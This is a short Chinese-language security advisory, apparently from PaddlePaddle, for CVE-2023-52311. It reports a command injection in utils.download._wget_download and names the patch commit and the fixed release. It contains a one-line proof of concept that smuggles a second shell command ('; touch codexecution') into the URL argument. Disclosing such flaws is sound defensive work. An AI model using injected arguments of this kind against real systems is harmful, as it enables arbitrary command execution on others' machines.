pdsa-2023-020_cn.md

PDSA-2023-020: Command injection in _wget_download

CVE编号

CVE-2023-52311

影响

_wget_download存在命令注入漏洞，可造成任意命令执行，PoC代码如下：

from paddle import utils

utils.download._wget_download("aa; touch codexecution", "bb")

补丁

我们在commit d5550d3f2f5bab48c783b4986ba1cd8e061ce542中对此问题进行了补丁。 修复将包含在飞桨2.6.0版本当中。

更多信息

请参考我们的安全指南以获得更多关于安全的信息，以及如何与我们联系问题。

贡献者

此漏洞由 huntr.com 提交。